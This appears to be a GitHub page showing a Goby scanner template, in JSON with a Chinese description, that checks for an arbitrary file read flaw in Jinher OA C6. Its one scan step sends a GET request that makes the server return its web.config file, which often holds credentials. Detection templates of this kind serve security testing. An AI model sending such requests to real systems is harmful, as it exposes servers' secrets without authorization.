-
Notifications
You must be signed in to change notification settings - Fork 197
/
Jinher_OA_C6_download.jsp_Arbitrary_file_read.json
51 lines (51 loc) · 1.87 KB
/
Jinher_OA_C6_download.jsp_Arbitrary_file_read.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
{
"Name": "金和OA C6 download.jsp 任意文件读取漏洞",
"Level": "3",
"Tags": [],
"GobyQuery": "app=\"Jinher-OA\"",
"Description": "金和OA C6 download.jsp文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息",
"Product": "",
"Homepage": "https://gobies.org/",
"Author": "[email protected]",
"Impact": "",
"Recommandation": "",
"References": [
"https://gobies.org/"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "xml",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-06-12 11:18:49",
"GobyVersion": "1.8.268"
}